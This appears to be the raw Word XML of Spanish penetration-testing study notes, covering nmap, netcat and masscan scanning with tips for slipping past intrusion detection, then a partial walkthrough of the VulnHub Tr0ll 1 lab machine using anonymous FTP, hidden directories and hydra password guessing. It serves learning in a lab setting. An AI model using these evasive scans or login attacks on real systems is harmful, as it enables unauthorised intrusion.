        <w:t>Escaneo mediante IPv6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43449AF4" w14:textId="50DA2DB0" w:rsidR="00A17F92" w:rsidRDefault="00A17F92" w:rsidP="00592777">
      <w:r>
        <w:t>Primero, haciendo uso de ping6, hacemos una petición ping6 ocn la dirección multicast ff02::1 (dirección multicast que manda paquetes a TODOS los nodos de la red).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D178A75" w14:textId="6DBA1971" w:rsidR="00A17F92" w:rsidRDefault="00937FB0" w:rsidP="00937FB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00937FB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F3FB996" wp14:editId="0ABF7361">
            <wp:extent cx="4892464" cy="3093988"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="13044513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451357" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4892464" cy="3093988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="678A7229" w14:textId="4E9E2330" w:rsidR="00937FB0" w:rsidRDefault="00937FB0" w:rsidP="00937FB0">
      <w:r>
        <w:t xml:space="preserve">Posteriormente con ip neigh podemos ver la lista de “vecinos” y descubrir la ipv6 que buscamos. Luego, ya podemos hacer un escáner en </w:t>
      </w:r>
      <w:r w:rsidRPr="00937FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D7485" w14:textId="6748F3CC" w:rsidR="00937FB0" w:rsidRPr="00937FB0" w:rsidRDefault="00937FB0" w:rsidP="00937FB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00937FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -n -6 (ipv6) -e eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13189D9B" w14:textId="645AD23A" w:rsidR="00937FB0" w:rsidRDefault="00937FB0" w:rsidP="00937FB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con -6 indicamos que use el protocolo IPv6 y con -e es nuestra interfaz para recibir paquetes. No puede ayudar a evadir algunos Firewall, pero no con todos los IDS, además, no encontrará todo los servicios, ya que no todos son compatibles con IPv6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00937FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Esta técnica es combinable con todas las anteriores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FF2A9" w14:textId="504ABF97" w:rsidR="00937FB0" w:rsidRPr="00BC68BE" w:rsidRDefault="00937FB0" w:rsidP="00937FB0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC68BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escaneo de Se</w:t>
      </w:r>
      <w:r w:rsidR="00BC68BE" w:rsidRPr="00BC68BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>rvicios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4D201" w14:textId="69B58925" w:rsidR="00BC68BE" w:rsidRDefault="00BC68BE" w:rsidP="00BC68BE">
      <w:r>
        <w:t>Ahora, llegados a este punto, no es importante hacer el escaneo sobre TODOS los puertos, ya podemos hacerlo sobre los puertos que hemos descubierto previamente. Así que:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745B2F5F" w14:textId="6FB396FA" w:rsidR="00BC68BE" w:rsidRPr="00BC68BE" w:rsidRDefault="00BC68BE" w:rsidP="00BC68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC68BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sV -n -p21,22,80 (ip a atacar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3F5C5" w14:textId="48A7C6E6" w:rsidR="00BC68BE" w:rsidRDefault="00BC68BE" w:rsidP="00BC68BE">
      <w:r>
        <w:t>Al ser tan dirigido, debería evitar los IDS. Por otra parte, para ver el Sistema Operativo es más complejo, por lo que hay que indicar también los puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADDD6A" w14:textId="6C71F428" w:rsidR="00BC68BE" w:rsidRPr="00BC68BE" w:rsidRDefault="00BC68BE" w:rsidP="00BC68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC68BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -O -n  -p21,80 --scan-delay 5 192.168.20.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636958D" w14:textId="1ABC7216" w:rsidR="00BC68BE" w:rsidRDefault="00BC68BE" w:rsidP="00BC68BE">
      <w:r>
        <w:t>Mientras menos puertos usamos y más delay le pongamos, más facilmente evadirá al IDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7172C2" w14:textId="0AC120C5" w:rsidR="00016CCF" w:rsidRPr="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00BC68BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016CCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Alternativas a nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12E6FB" w14:textId="4DD59F9C" w:rsidR="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:r w:rsidRPr="00016CCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Naabo: </w:t>
      </w:r>
      <w:r>
        <w:t>Alternativa a Nmap escrita en Go. Se usa de manera muy similar a Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17591232" w14:textId="0C92B0BF" w:rsidR="00016CCF" w:rsidRPr="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016CCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaneo manual con Netcat: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72933573" w14:textId="61287DF1" w:rsidR="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcat -nv 192.168.20.130 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697477D7" w14:textId="68B5E8B0" w:rsidR="00016CCF" w:rsidRPr="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:r w:rsidRPr="00016CCF">
        <w:t>De manera manual podríamos ir probando distintas IPs poco a poco. Para descubrir puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC999B" w14:textId="019F89F1" w:rsidR="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcat -nvw2 (ip a atacar) 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B0D8E" w14:textId="56ACF6FF" w:rsidR="00016CCF" w:rsidRPr="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:r w:rsidRPr="00016CCF">
        <w:t>En este caso, irá buscando los 100 primeros puertos, claro, todo esto es capaz de ser detectado por el IDS. Ahora bien, para servicios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C7ECF" w14:textId="04654D76" w:rsidR="00016CCF" w:rsidRDefault="00016CCF" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netcat -nv (ip a atacar) (puerto a descubrir su servicio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D596143" w14:textId="38942761" w:rsidR="00155820" w:rsidRPr="00155820" w:rsidRDefault="00155820" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155820">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Escaneo Ultrarrápido con MASSCAN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B79845" w14:textId="53BDAF99" w:rsidR="00155820" w:rsidRDefault="00155820" w:rsidP="00016CCF">
      <w:r w:rsidRPr="00155820">
        <w:t>Herramienta capaz de escanear de manerá los puertos. Es capaz de detectaar todos los puertos de Internet en 5 minutos.</w:t>
      </w:r>
      <w:r w:rsidR="00227ADD">
        <w:t xml:space="preserve"> EN LAS PRUEBAS DE VM NO FUNCIONA EN HOST-ONLY, SOLO EN NAT</w:t>
      </w:r>
      <w:r w:rsidR="00204569">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF19EB2" w14:textId="69B4CB25" w:rsidR="00227ADD" w:rsidRDefault="00227ADD" w:rsidP="00016CCF">
      <w:r>
        <w:t>Esta herramienta se usa en redes muy grandes, no en una máquina en concreto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E23823" w14:textId="41E1AAA7" w:rsidR="00227ADD" w:rsidRPr="00227ADD" w:rsidRDefault="00227ADD" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227ADD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo masscan 192.168.20.0/24 -p80 --interface eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540058B" w14:textId="4FF8421D" w:rsidR="00227ADD" w:rsidRPr="00155820" w:rsidRDefault="00227ADD" w:rsidP="00016CCF">
      <w:r>
        <w:t xml:space="preserve">En este caso estamos seleccionando únicamente que busque el puerto 80. Inicialmente manda 100 paquetes por segundos pero con </w:t>
      </w:r>
      <w:r w:rsidRPr="00227ADD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">--rate </w:t>
      </w:r>
      <w:r>
        <w:t>podemos seleccionar muchos más.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73933E" w14:textId="624F774A" w:rsidR="00155820" w:rsidRDefault="00204569" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo masscan 192.168.0.0/24 --top-ports 100  --interface eth0  --rate 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7A1E4" w14:textId="781DA0A3" w:rsidR="003A3BF7" w:rsidRDefault="00204569" w:rsidP="00016CCF">
      <w:r>
        <w:t>El comando de arriba es una forma de conseguir analizar una red de manera ultrarrápida.</w:t>
      </w:r>
      <w:r w:rsidR="00C41599">
        <w:t xml:space="preserve"> En cuestión de segundos es capaz de escanear toda la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A879CA" w14:textId="77777777" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C93C5D" w14:textId="460678FD" w:rsidR="00204569" w:rsidRPr="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="00016CCF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A3BF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resolución de la Máquina Tr0LL 1 de VULNHUB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C4B92" w14:textId="600A034B" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Lo primero es hacer un escaneo de los puertos y los servicios que corren en la máquina:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D3DE4" w14:textId="7911AC6B" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r w:rsidRPr="003A3BF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A955F4" wp14:editId="7335FC01">
            <wp:extent cx="5400040" cy="2062480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13722805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280512" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2062480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36108107" w14:textId="7BA045EA" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Lo primero que podemos hacer es ir a Google y buscar si alguna de esas versiones de los distintos servicios tienen alguna vulnerabilidad, exploit, etc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D9745" w14:textId="78EA2634" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Pero al hacer una búsqueda rápida no encontramos nada especialmente útil. Normalmente si encontramos buscamos el nombre de la versión con la palabra “exploit” rápidamente suelen aparecernos repositorios de GitHub o herramientas. No es el caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D69DA9" w14:textId="02EF4B29" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r w:rsidRPr="003A3BF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D52F7A7" wp14:editId="305277B5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3063505" cy="3109229"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21441"/>
                <wp:lineTo x="21493" y="21441"/>
                <wp:lineTo x="21493" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="17923579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357964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3063505" cy="3109229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Vemos que hay una aplicación web corriendo por el puerto 80. Podemos ir allí y mirar su código fuente. Pero no hay nada, solo la imágen de la derecha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31231978" w14:textId="4B66EA58" w:rsidR="003A3BF7" w:rsidRDefault="003A3BF7" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Al ver que tiene un servicio FTP corriendo, sabemos que quizás tenga un usuario anónimo activado. Así que probamos conectarnos con “anonymous” sin contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46390BBC" w14:textId="07815BB0" w:rsidR="003A3BF7" w:rsidRDefault="002D5421" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Tras entrar vemos un archivo lol.pcap para analizarlo con Wireshark y encontrar el siguiente mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A72F74" w14:textId="4C6FE6D0" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68B18561" wp14:editId="29A57B17">
            <wp:extent cx="5400040" cy="1858010"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="11653416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341605" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1858010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6A202" w14:textId="40BC5D11" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Con esto, podemos intentar acceder a sp3rs3cr3tdirlol desde la aplicación web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B26C7" w14:textId="225C1402" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254F3785" wp14:editId="6B11BBBC">
            <wp:extent cx="4176122" cy="1988992"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1577173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17341" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4176122" cy="1988992"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41785C2E" w14:textId="77777777" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="003A3BF7"/>
    <w:p w14:paraId="6DCD4C74" w14:textId="7B650EBB" w:rsidR="003A3BF7" w:rsidRDefault="002D5421" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Nos descargamos el binario de roflmao y al analizarlo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF314F1" w14:textId="78090946" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5421">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="242C0186" wp14:editId="47433304">
            <wp:extent cx="3901778" cy="1295512"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="19137135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713588" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3901778" cy="1295512"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5C70E" w14:textId="395D863A" w:rsidR="002D5421" w:rsidRDefault="002D5421" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Nos damos cuenta que tiene una cadena de texto que dice eso. Así que podríamos intentar llevarlo a la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3949DB" w14:textId="1B35836D" w:rsidR="002D5421" w:rsidRDefault="00CB1168" w:rsidP="003A3BF7">
      <w:r>
        <w:t xml:space="preserve">Al llegar allí nos encontramos con dos directorios. Uno contiene una lista de lo que parece ser nombres de usuario y otro es un fichero llamado Pass.txt que contiene la palabra Good_job_:) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFA6E4" w14:textId="65A0E90C" w:rsidR="00CB1168" w:rsidRDefault="00CB1168" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Este útimo fichero se llama “En este fichero está la contraseña”. Por lo que la contraseña podría ser también “Pass.txt”. Sea como sea, metemos los usuarios en un documento de texto y probamos con hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69196738" w14:textId="00D8695A" w:rsidR="00CB1168" w:rsidRDefault="00CB1168" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB1168">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63AC2562" wp14:editId="0B5617B6">
            <wp:extent cx="4305300" cy="1836573"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14910251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025122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4327079" cy="1845864"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E5912" w14:textId="7503988B" w:rsidR="00CB1168" w:rsidRDefault="00CB1168" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Con Good_job_:) no funciona pero con Pass.txt sí:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFF6AC" w14:textId="79FA66B4" w:rsidR="00CB1168" w:rsidRDefault="00CB1168" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB1168">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE1FDED" wp14:editId="61FE75CF">
            <wp:extent cx="5400040" cy="1195070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="19619975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997567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1195070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="164305CC" w14:textId="3584D867" w:rsidR="00CB1168" w:rsidRDefault="00CC72A4" w:rsidP="00CC72A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9B45E0" wp14:editId="61D4A32D">
            <wp:extent cx="4442845" cy="1082134"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2288004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00437" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4442845" cy="1082134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EC634" w14:textId="77777777" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7"/>
    <w:p w14:paraId="78503E84" w14:textId="57B760BD" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Podemos entrar y vemos que no podemos acceder a la Bandera de /root. Pero vemos que nos echa al poco, ejecutando una tarea cron:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31071498" w14:textId="27F93FA2" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="009B1ED1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1E24EC" wp14:editId="45ECC974">
            <wp:extent cx="5400040" cy="641985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="21297112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11279" name=""/>
                    <pic:cNvPicPr/>
